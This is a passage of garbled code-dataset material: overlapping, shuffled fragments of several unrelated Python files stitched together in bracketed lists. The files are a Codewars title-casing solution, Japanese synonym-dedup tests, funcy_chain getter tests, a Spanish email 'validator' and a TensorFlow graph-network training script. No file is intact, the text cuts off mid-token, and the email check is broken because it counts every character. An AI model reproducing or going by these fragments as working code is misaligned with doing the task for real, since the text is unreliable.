"handy. \"\"\" return string.capwords(string_input) print(to_jaden_case(\"How can mirrors be real if our eyes aren't",
"<gh_stars>0 \"\"\" https://www.codewars.com/kata/5390bac347d09b7da40006f6 Given a string, return a string in which each word",
"each word is capitalized Example: Not Jaden-Cased: \"How can mirrors be real if",
"eyes aren't real\")) print(to_jaden_case2(\"How can mirrors be real if our eyes aren't real\"))",
"string, return a string in which each word is capitalized Example: Not Jaden-Cased:",
"Eyes Aren't Real\" \"\"\" import string def to_jaden_case(string: str) -> str: \"\"\" My",
"be real if our eyes aren't real\")) print(to_jaden_case2(\"How can mirrors be real if",
"a string, return a string in which each word is capitalized Example: Not",
"Real If Our Eyes Aren't Real\" \"\"\" import string def to_jaden_case(string: str) ->",
"Can Mirrors Be Real If Our Eyes Aren't Real\" \"\"\" import string def",
"if our eyes aren't real\" Jaden-Cased: \"How Can Mirrors Be Real If Our",
"Another person's version. string.capwords() is handy. \"\"\" return string.capwords(string_input) print(to_jaden_case(\"How can mirrors be",
"capitalized Example: Not Jaden-Cased: \"How can mirrors be real if our eyes aren't",
"str: \"\"\" My implementation \"\"\" return ' '.join([word.capitalize() for word in string.split()]) def",
"My implementation \"\"\" return ' '.join([word.capitalize() for word in string.split()]) def to_jaden_case2(string_input: str)",
"Example: Not Jaden-Cased: \"How can mirrors be real if our eyes aren't real\"",
"Our Eyes Aren't Real\" \"\"\" import string def to_jaden_case(string: str) -> str: \"\"\"",
"-> str: \"\"\" Another person's version. string.capwords() is handy. \"\"\" return string.capwords(string_input) print(to_jaden_case(\"How",
"\"How can mirrors be real if our eyes aren't real\" Jaden-Cased: \"How Can",
"str) -> str: \"\"\" Another person's version. string.capwords() is handy. \"\"\" return string.capwords(string_input)",
"a string in which each word is capitalized Example: Not Jaden-Cased: \"How can",
"eyes aren't real\" Jaden-Cased: \"How Can Mirrors Be Real If Our Eyes Aren't",
"If Our Eyes Aren't Real\" \"\"\" import string def to_jaden_case(string: str) -> str:",
"Be Real If Our Eyes Aren't Real\" \"\"\" import string def to_jaden_case(string: str)",
"\"\"\" return string.capwords(string_input) print(to_jaden_case(\"How can mirrors be real if our eyes aren't real\"))",
"-> str: \"\"\" My implementation \"\"\" return ' '.join([word.capitalize() for word in string.split()])",
"' '.join([word.capitalize() for word in string.split()]) def to_jaden_case2(string_input: str) -> str: \"\"\" Another",
"Jaden-Cased: \"How Can Mirrors Be Real If Our Eyes Aren't Real\" \"\"\" import",
"our eyes aren't real\" Jaden-Cased: \"How Can Mirrors Be Real If Our Eyes",
"https://www.codewars.com/kata/5390bac347d09b7da40006f6 Given a string, return a string in which each word is capitalized",
"string.split()]) def to_jaden_case2(string_input: str) -> str: \"\"\" Another person's version. string.capwords() is handy.",
"can mirrors be real if our eyes aren't real\" Jaden-Cased: \"How Can Mirrors",
"\"\"\" Another person's version. string.capwords() is handy. \"\"\" return string.capwords(string_input) print(to_jaden_case(\"How can mirrors",
"print(to_jaden_case(\"How can mirrors be real if our eyes aren't real\")) print(to_jaden_case2(\"How can mirrors",
"to_jaden_case2(string_input: str) -> str: \"\"\" Another person's version. string.capwords() is handy. \"\"\" return",
"be real if our eyes aren't real\" Jaden-Cased: \"How Can Mirrors Be Real",
"version. string.capwords() is handy. \"\"\" return string.capwords(string_input) print(to_jaden_case(\"How can mirrors be real if",
"real if our eyes aren't real\")) print(to_jaden_case2(\"How can mirrors be real if our",
"for word in string.split()]) def to_jaden_case2(string_input: str) -> str: \"\"\" Another person's version.",
"string.capwords(string_input) print(to_jaden_case(\"How can mirrors be real if our eyes aren't real\")) print(to_jaden_case2(\"How can",
"word is capitalized Example: Not Jaden-Cased: \"How can mirrors be real if our",
"Given a string, return a string in which each word is capitalized Example:",
"return a string in which each word is capitalized Example: Not Jaden-Cased: \"How",
"which each word is capitalized Example: Not Jaden-Cased: \"How can mirrors be real",
"Real\" \"\"\" import string def to_jaden_case(string: str) -> str: \"\"\" My implementation \"\"\"",
"def to_jaden_case2(string_input: str) -> str: \"\"\" Another person's version. string.capwords() is handy. \"\"\"",
"real if our eyes aren't real\" Jaden-Cased: \"How Can Mirrors Be Real If",
"Mirrors Be Real If Our Eyes Aren't Real\" \"\"\" import string def to_jaden_case(string:",
"\"\"\" import string def to_jaden_case(string: str) -> str: \"\"\" My implementation \"\"\" return",
"string def to_jaden_case(string: str) -> str: \"\"\" My implementation \"\"\" return ' '.join([word.capitalize()",
"aren't real\" Jaden-Cased: \"How Can Mirrors Be Real If Our Eyes Aren't Real\"",
"word in string.split()]) def to_jaden_case2(string_input: str) -> str: \"\"\" Another person's version. string.capwords()",
"mirrors be real if our eyes aren't real\")) print(to_jaden_case2(\"How can mirrors be real",
"in which each word is capitalized Example: Not Jaden-Cased: \"How can mirrors be",
"real\" Jaden-Cased: \"How Can Mirrors Be Real If Our Eyes Aren't Real\" \"\"\"",
"if our eyes aren't real\")) print(to_jaden_case2(\"How can mirrors be real if our eyes",
"in string.split()]) def to_jaden_case2(string_input: str) -> str: \"\"\" Another person's version. string.capwords() is",
"\"How Can Mirrors Be Real If Our Eyes Aren't Real\" \"\"\" import string",
"Aren't Real\" \"\"\" import string def to_jaden_case(string: str) -> str: \"\"\" My implementation",
"str: \"\"\" Another person's version. string.capwords() is handy. \"\"\" return string.capwords(string_input) print(to_jaden_case(\"How can",
"implementation \"\"\" return ' '.join([word.capitalize() for word in string.split()]) def to_jaden_case2(string_input: str) ->"
] |
[
"tlc,全肺気量\") is False assert f.duplicated(\"リンたんぱく質,リン蛋白質,リンタンパク質\") is True assert f.duplicated(\"グルタチオン => グルタチオン,タチオン,ランデールチオン\") is False",
"f = Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is True assert f.duplicated(\"レナリドミド, レナリドマイド\") is False assert",
"'0.5.0' def test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is True assert f.duplicated(\"レナリドミド, レナリドマイド\")",
"assert f.duplicated(\"エダマメ => 枝豆\") is True assert f.duplicated(\"tlc => tlc,全肺気量\") is False assert",
"= Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is True assert f.duplicated(\"レナリドミド, レナリドマイド\") is False assert f.duplicated(\"エダマメ,枝豆\")",
"is True assert f.duplicated(\"エダマメ => 枝豆\") is True assert f.duplicated(\"tlc => tlc,全肺気量\") is",
"import Filter def test_version(): assert __version__ == '0.5.0' def test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\")",
"is True assert f.duplicated(\"飲む,呑む\") is True assert f.duplicated(\"エダマメ => 枝豆\") is True assert",
"assert f.duplicated(\"飲む,呑む\") is True assert f.duplicated(\"エダマメ => 枝豆\") is True assert f.duplicated(\"tlc =>",
"def test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is True assert f.duplicated(\"レナリドミド, レナリドマイド\") is",
"f.duplicated(\"飲む,呑む\") is True assert f.duplicated(\"エダマメ => 枝豆\") is True assert f.duplicated(\"tlc => tlc,全肺気量\")",
"is True assert f.duplicated(\"えだまめ,枝豆\") is True assert f.duplicated(\"飲む,呑む\") is True assert f.duplicated(\"エダマメ =>",
"枝豆\") is True assert f.duplicated(\"tlc => tlc,全肺気量\") is False assert f.duplicated(\"リンたんぱく質,リン蛋白質,リンタンパク質\") is True",
"True assert f.duplicated(\"えだまめ,枝豆\") is True assert f.duplicated(\"飲む,呑む\") is True assert f.duplicated(\"エダマメ => 枝豆\")",
"assert f.duplicated(\"レナリドミド, レナリドマイド\") is False assert f.duplicated(\"エダマメ,枝豆\") is True assert f.duplicated(\"えだまめ,枝豆\") is True",
"f.duplicated(\"レナリドミド, レナリドマイド\") is False assert f.duplicated(\"エダマメ,枝豆\") is True assert f.duplicated(\"えだまめ,枝豆\") is True assert",
"__version__ from chinormfilter.cli import Filter def test_version(): assert __version__ == '0.5.0' def test_kuro2sudachi_cli(capsys):",
"f.duplicated(\"tlc => tlc,全肺気量\") is False assert f.duplicated(\"リンたんぱく質,リン蛋白質,リンタンパク質\") is True assert f.duplicated(\"グルタチオン => グルタチオン,タチオン,ランデールチオン\")",
"f.duplicated(\"エダマメ,枝豆\") is True assert f.duplicated(\"えだまめ,枝豆\") is True assert f.duplicated(\"飲む,呑む\") is True assert f.duplicated(\"エダマメ",
"def test_version(): assert __version__ == '0.5.0' def test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\")",
"test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is True assert f.duplicated(\"レナリドミド, レナリドマイド\") is False",
"assert f.duplicated(\"エダマメ,枝豆\") is True assert f.duplicated(\"えだまめ,枝豆\") is True assert f.duplicated(\"飲む,呑む\") is True assert",
"f.duplicated(\"林檎,りんご\") is True assert f.duplicated(\"レナリドミド, レナリドマイド\") is False assert f.duplicated(\"エダマメ,枝豆\") is True assert",
"True assert f.duplicated(\"エダマメ => 枝豆\") is True assert f.duplicated(\"tlc => tlc,全肺気量\") is False",
"False assert f.duplicated(\"エダマメ,枝豆\") is True assert f.duplicated(\"えだまめ,枝豆\") is True assert f.duplicated(\"飲む,呑む\") is True",
"True assert f.duplicated(\"tlc => tlc,全肺気量\") is False assert f.duplicated(\"リンたんぱく質,リン蛋白質,リンタンパク質\") is True assert f.duplicated(\"グルタチオン",
"chinormfilter import __version__ from chinormfilter.cli import Filter def test_version(): assert __version__ == '0.5.0'",
"chinormfilter.cli import Filter def test_version(): assert __version__ == '0.5.0' def test_kuro2sudachi_cli(capsys): f =",
"レナリドマイド\") is False assert f.duplicated(\"エダマメ,枝豆\") is True assert f.duplicated(\"えだまめ,枝豆\") is True assert f.duplicated(\"飲む,呑む\")",
"=> tlc,全肺気量\") is False assert f.duplicated(\"リンたんぱく質,リン蛋白質,リンタンパク質\") is True assert f.duplicated(\"グルタチオン => グルタチオン,タチオン,ランデールチオン\") is",
"True assert f.duplicated(\"飲む,呑む\") is True assert f.duplicated(\"エダマメ => 枝豆\") is True assert f.duplicated(\"tlc",
"import __version__ from chinormfilter.cli import Filter def test_version(): assert __version__ == '0.5.0' def",
"from chinormfilter.cli import Filter def test_version(): assert __version__ == '0.5.0' def test_kuro2sudachi_cli(capsys): f",
"Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is True assert f.duplicated(\"レナリドミド, レナリドマイド\") is False assert f.duplicated(\"エダマメ,枝豆\") is",
"Filter def test_version(): assert __version__ == '0.5.0' def test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\") assert",
"f.duplicated(\"えだまめ,枝豆\") is True assert f.duplicated(\"飲む,呑む\") is True assert f.duplicated(\"エダマメ => 枝豆\") is True",
"from chinormfilter import __version__ from chinormfilter.cli import Filter def test_version(): assert __version__ ==",
"f.duplicated(\"エダマメ => 枝豆\") is True assert f.duplicated(\"tlc => tlc,全肺気量\") is False assert f.duplicated(\"リンたんぱく質,リン蛋白質,リンタンパク質\")",
"is True assert f.duplicated(\"tlc => tlc,全肺気量\") is False assert f.duplicated(\"リンたんぱく質,リン蛋白質,リンタンパク質\") is True assert",
"assert __version__ == '0.5.0' def test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is True",
"__version__ == '0.5.0' def test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is True assert",
"True assert f.duplicated(\"レナリドミド, レナリドマイド\") is False assert f.duplicated(\"エダマメ,枝豆\") is True assert f.duplicated(\"えだまめ,枝豆\") is",
"is False assert f.duplicated(\"エダマメ,枝豆\") is True assert f.duplicated(\"えだまめ,枝豆\") is True assert f.duplicated(\"飲む,呑む\") is",
"== '0.5.0' def test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is True assert f.duplicated(\"レナリドミド,",
"assert f.duplicated(\"tlc => tlc,全肺気量\") is False assert f.duplicated(\"リンたんぱく質,リン蛋白質,リンタンパク質\") is True assert f.duplicated(\"グルタチオン =>",
"is True assert f.duplicated(\"レナリドミド, レナリドマイド\") is False assert f.duplicated(\"エダマメ,枝豆\") is True assert f.duplicated(\"えだまめ,枝豆\")",
"=> 枝豆\") is True assert f.duplicated(\"tlc => tlc,全肺気量\") is False assert f.duplicated(\"リンたんぱく質,リン蛋白質,リンタンパク質\") is",
"assert f.duplicated(\"林檎,りんご\") is True assert f.duplicated(\"レナリドミド, レナリドマイド\") is False assert f.duplicated(\"エダマメ,枝豆\") is True",
"assert f.duplicated(\"えだまめ,枝豆\") is True assert f.duplicated(\"飲む,呑む\") is True assert f.duplicated(\"エダマメ => 枝豆\") is",
"test_version(): assert __version__ == '0.5.0' def test_kuro2sudachi_cli(capsys): f = Filter(dict_type=\"full\") assert f.duplicated(\"林檎,りんご\") is"
] |
[
"\"firstname\": \"Alice\", \"lastname\": \"Liddle\", }, \"user2\": { \"firstname\": \"Bob\", \"lastname\": \"Kennedy\", }, }",
"\"user1\": { \"firstname\": \"Alice\", \"lastname\": \"Liddle\", }, \"user2\": { \"firstname\": \"Bob\", \"lastname\": \"Kennedy\",",
"test_names(Chain): data = { \"user1\": { \"firstname\": \"Alice\", \"lastname\": \"Liddle\", }, \"user2\": {",
"[1, 2, {\"d\": [3, {1: 2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1,",
"{ \"user1\": { \"firstname\": \"Alice\", \"lastname\": \"Liddle\", }, \"user2\": { \"firstname\": \"Bob\", \"lastname\":",
"\"firstname\": \"Bob\", \"lastname\": \"Kennedy\", }, } names = ( Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\",",
"[2] def test_names(Chain): data = { \"user1\": { \"firstname\": \"Alice\", \"lastname\": \"Liddle\", },",
"{\"d\": [3, {1: 2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1, 1])).value ==",
"= { \"user1\": { \"firstname\": \"Alice\", \"lastname\": \"Liddle\", }, \"user2\": { \"firstname\": \"Bob\",",
"import getter def test_long_path(Chain): data = [{\"a\": {\"b\": {\"c\": [1, 2, {\"d\": [3,",
"def test_long_path(Chain): data = [{\"a\": {\"b\": {\"c\": [1, 2, {\"d\": [3, {1: 2}]}]}}}]",
"data = [{\"a\": {\"b\": {\"c\": [1, 2, {\"d\": [3, {1: 2}]}]}}}] assert Chain(data).map(getter([\"a\",",
"[{\"a\": {\"b\": {\"c\": [1, 2, {\"d\": [3, {1: 2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\", \"c\",",
"\"Liddle\", }, \"user2\": { \"firstname\": \"Bob\", \"lastname\": \"Kennedy\", }, } names = (",
"== [2] def test_names(Chain): data = { \"user1\": { \"firstname\": \"Alice\", \"lastname\": \"Liddle\",",
"from funcy_chain import getter def test_long_path(Chain): data = [{\"a\": {\"b\": {\"c\": [1, 2,",
"2, {\"d\": [3, {1: 2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1, 1])).value",
"= [{\"a\": {\"b\": {\"c\": [1, 2, {\"d\": [3, {1: 2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\",",
"{\"b\": {\"c\": [1, 2, {\"d\": [3, {1: 2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2,",
"assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1, 1])).value == [2] def test_names(Chain): data",
"\"d\", 1, 1])).value == [2] def test_names(Chain): data = { \"user1\": { \"firstname\":",
"[3, {1: 2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1, 1])).value == [2]",
"\"Alice\", \"lastname\": \"Liddle\", }, \"user2\": { \"firstname\": \"Bob\", \"lastname\": \"Kennedy\", }, } names",
"1])).value == [2] def test_names(Chain): data = { \"user1\": { \"firstname\": \"Alice\", \"lastname\":",
"funcy_chain import getter def test_long_path(Chain): data = [{\"a\": {\"b\": {\"c\": [1, 2, {\"d\":",
"\"b\", \"c\", 2, \"d\", 1, 1])).value == [2] def test_names(Chain): data = {",
"\"lastname\": \"Liddle\", }, \"user2\": { \"firstname\": \"Bob\", \"lastname\": \"Kennedy\", }, } names =",
"names = ( Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\", \".join) ).value assert names == [\"<NAME>\",",
"}, } names = ( Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\", \".join) ).value assert names",
"\"Kennedy\", }, } names = ( Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\", \".join) ).value assert",
"Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1, 1])).value == [2] def test_names(Chain): data =",
"= ( Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\", \".join) ).value assert names == [\"<NAME>\", \"<NAME>\"]",
"getter def test_long_path(Chain): data = [{\"a\": {\"b\": {\"c\": [1, 2, {\"d\": [3, {1:",
"{\"c\": [1, 2, {\"d\": [3, {1: 2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\",",
"2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1, 1])).value == [2] def test_names(Chain):",
"def test_names(Chain): data = { \"user1\": { \"firstname\": \"Alice\", \"lastname\": \"Liddle\", }, \"user2\":",
"\"Bob\", \"lastname\": \"Kennedy\", }, } names = ( Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\", \".join)",
"1, 1])).value == [2] def test_names(Chain): data = { \"user1\": { \"firstname\": \"Alice\",",
"}, \"user2\": { \"firstname\": \"Bob\", \"lastname\": \"Kennedy\", }, } names = ( Chain(data).items().map(getter([1,",
"{ \"firstname\": \"Bob\", \"lastname\": \"Kennedy\", }, } names = ( Chain(data).items().map(getter([1, \"lastname\"], [1,",
"<filename>test/test_getter.py from funcy_chain import getter def test_long_path(Chain): data = [{\"a\": {\"b\": {\"c\": [1,",
"\"user2\": { \"firstname\": \"Bob\", \"lastname\": \"Kennedy\", }, } names = ( Chain(data).items().map(getter([1, \"lastname\"],",
"test_long_path(Chain): data = [{\"a\": {\"b\": {\"c\": [1, 2, {\"d\": [3, {1: 2}]}]}}}] assert",
"\"lastname\": \"Kennedy\", }, } names = ( Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\", \".join) ).value",
"{1: 2}]}]}}}] assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1, 1])).value == [2] def",
"} names = ( Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\", \".join) ).value assert names ==",
"\"c\", 2, \"d\", 1, 1])).value == [2] def test_names(Chain): data = { \"user1\":",
"2, \"d\", 1, 1])).value == [2] def test_names(Chain): data = { \"user1\": {",
"data = { \"user1\": { \"firstname\": \"Alice\", \"lastname\": \"Liddle\", }, \"user2\": { \"firstname\":",
"{ \"firstname\": \"Alice\", \"lastname\": \"Liddle\", }, \"user2\": { \"firstname\": \"Bob\", \"lastname\": \"Kennedy\", },"
] |
[
"0 email = input(\"Ingrese su correo electronico: \") for i in email: if",
"su correo electronico: \") for i in email: if (\"@\" or \".\"): contador",
"(\"@\" or \".\"): contador = contador+1 if contador == 2: print(\"Correo Valido\") else:",
"\") for i in email: if (\"@\" or \".\"): contador = contador+1 if",
"\".\"): contador = contador+1 if contador == 2: print(\"Correo Valido\") else: print(\"Correo Invalido\")",
"email: if (\"@\" or \".\"): contador = contador+1 if contador == 2: print(\"Correo",
"electronico: \") for i in email: if (\"@\" or \".\"): contador = contador+1",
"or \".\"): contador = contador+1 if contador == 2: print(\"Correo Valido\") else: print(\"Correo",
"= 0 email = input(\"Ingrese su correo electronico: \") for i in email:",
"input(\"Ingrese su correo electronico: \") for i in email: if (\"@\" or \".\"):",
"for i in email: if (\"@\" or \".\"): contador = contador+1 if contador",
"Validacion de Correo Electronico en Python contador = 0 email = input(\"Ingrese su",
"# Validacion de Correo Electronico en Python contador = 0 email = input(\"Ingrese",
"en Python contador = 0 email = input(\"Ingrese su correo electronico: \") for",
"email = input(\"Ingrese su correo electronico: \") for i in email: if (\"@\"",
"i in email: if (\"@\" or \".\"): contador = contador+1 if contador ==",
"Electronico en Python contador = 0 email = input(\"Ingrese su correo electronico: \")",
"de Correo Electronico en Python contador = 0 email = input(\"Ingrese su correo",
"correo electronico: \") for i in email: if (\"@\" or \".\"): contador =",
"Python contador = 0 email = input(\"Ingrese su correo electronico: \") for i",
"contador = 0 email = input(\"Ingrese su correo electronico: \") for i in",
"= input(\"Ingrese su correo electronico: \") for i in email: if (\"@\" or",
"Correo Electronico en Python contador = 0 email = input(\"Ingrese su correo electronico:",
"in email: if (\"@\" or \".\"): contador = contador+1 if contador == 2:",
"if (\"@\" or \".\"): contador = contador+1 if contador == 2: print(\"Correo Valido\")"
] |
[
"python3 import json import os import sys NAME = \"{VERSION_FROM}-{VERSION_CURRENT}-{VERSION_TO}-{STAGE}.json\" with open(NAME.format(**os.environ), \"w\")",
"#!/usr/bin/env python3 import json import os import sys NAME = \"{VERSION_FROM}-{VERSION_CURRENT}-{VERSION_TO}-{STAGE}.json\" with open(NAME.format(**os.environ),",
"import json import os import sys NAME = \"{VERSION_FROM}-{VERSION_CURRENT}-{VERSION_TO}-{STAGE}.json\" with open(NAME.format(**os.environ), \"w\") as",
"json import os import sys NAME = \"{VERSION_FROM}-{VERSION_CURRENT}-{VERSION_TO}-{STAGE}.json\" with open(NAME.format(**os.environ), \"w\") as fd:",
"os import sys NAME = \"{VERSION_FROM}-{VERSION_CURRENT}-{VERSION_TO}-{STAGE}.json\" with open(NAME.format(**os.environ), \"w\") as fd: json.dump(sys.argv, fd)",
"import os import sys NAME = \"{VERSION_FROM}-{VERSION_CURRENT}-{VERSION_TO}-{STAGE}.json\" with open(NAME.format(**os.environ), \"w\") as fd: json.dump(sys.argv,"
] |
[
"# Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation",
"[mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train, y_val, y_test, train_mask,",
"evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and",
"print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc =",
"FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func",
"# 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method",
"Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond freq = 600",
"for j in range(0, 3): temp2 = temp1 + [mo[j]] for k in",
"sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features,",
"Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set random seed",
"range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14,",
"FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not",
"in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a')",
"sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss,",
"'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of",
"of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay',",
"'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in",
"as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i))",
"mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures,",
"mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss:",
"support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op,",
"model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() # Define model evaluation",
"dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) #",
"'dense': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MLP",
"variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [], [], [] train_loss,",
"FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func",
"'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).')",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500",
"mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]]",
"Code_utils import * from Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------#",
"= MORE else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define",
"i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\",",
"seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS =",
"\"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration",
"dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training",
"MORE #--------------------------- main process ---------------------------# # Set random seed seed = 123 np.random.seed(seed)",
"training #-------------------------- import package --------------------------# from __future__ import division from __future__ import print_function",
"of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\",",
"Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost,",
"placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch + 1),",
"cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\",",
"open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in",
"Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i))",
"= [0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000] mo =",
"- keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping',",
"= 1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree)",
"[], [], [] train_loss, val_loss, Tloss = [], [], [] # Train model",
"print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]]",
"preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support =",
"'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()),",
"Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support",
"preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports =",
"= epoch + 1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train,",
"2, 20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support,",
"time.time() train_time_list = [] stop_epoch = 0 for epoch in range(FLAGS.epochs): t =",
"\"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support, y_test,",
"'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create",
"\"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost,",
